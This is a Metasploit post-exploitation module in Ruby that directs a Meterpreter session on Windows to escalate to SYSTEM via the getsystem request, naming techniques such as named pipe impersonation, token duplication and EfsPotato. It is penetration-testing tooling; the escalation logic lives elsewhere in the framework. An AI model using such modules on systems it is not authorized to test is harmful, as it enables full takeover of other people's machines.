GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/escalate/getsystem.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasm'
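# Post module that asks an existing Meterpreter session on Windows to
# elevate itself to the SYSTEM account through the priv extension's
# getsystem request, and reports whether the elevation succeeded.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv

  # Registers the module metadata and the optional TECHNIQUE selector.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalation',
        'Description' => %q{
          This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various
          techniques.
        },
        'License' => MSF_LICENSE,
        'Author' => 'hdm',
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        # Meterpreter command this module depends on; it is the one request
        # issued by #run through client.priv.getsystem.
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              priv_elevate_getsystem
            ]
          }
        },
        'Notes' => {
          'AKA' => [
            'Named Pipe Impersonation',
            'Token Duplication',
            'RPCSS',
            'PrintSpooler',
            'EFSRPC',
            'EfsPotato'
          ],
          'Stability' => [CRASH_SAFE],
          # NOTE(review): both lists below are declared empty. The techniques
          # themselves are implemented outside this file, so whether they
          # leave log entries or on-host artifacts cannot be confirmed here;
          # verify and declare them so reports and detections stay accurate.
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])
    ])
  end

  # Reports that the session's platform is not handled and stops the module.
  #
  # @raise [Rex::Script::Completed] always, after printing the error
  def unsupported
    print_error('This platform is not supported with this script!')
    raise Rex::Script::Completed
  end

  # Runs the escalation against the current session.
  #
  # Reads TECHNIQUE from the datastore (0, the default, is described by the
  # option as "try them all"), rejects sessions that are not Windows on
  # x86/x64, returns early when the session is already SYSTEM, and otherwise
  # issues the getsystem request and prints the outcome.
  #
  # @return [void]
  def run
    technique = datastore['TECHNIQUE'].to_i

    unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)

    if is_system?
      print_good('This session already has SYSTEM privileges')
      return
    end

    begin
      result = client.priv.getsystem(technique)
    rescue Rex::Post::Meterpreter::RequestError
      print_error('Failed to obtain SYSTEM access')
      return
    end

    # getsystem answers with a pair whose second element is the technique
    # number. The first element is treated here as the success flag, so a
    # request that completes without raising but did not elevate is reported
    # as a failure instead of as "technique 0".
    # NOTE(review): confirm the pair layout against the priv extension.
    if result && result[0]
      print_good("Obtained SYSTEM via technique #{result[1]}")
    else
      print_error('Failed to obtain SYSTEM access')
    end
  end
end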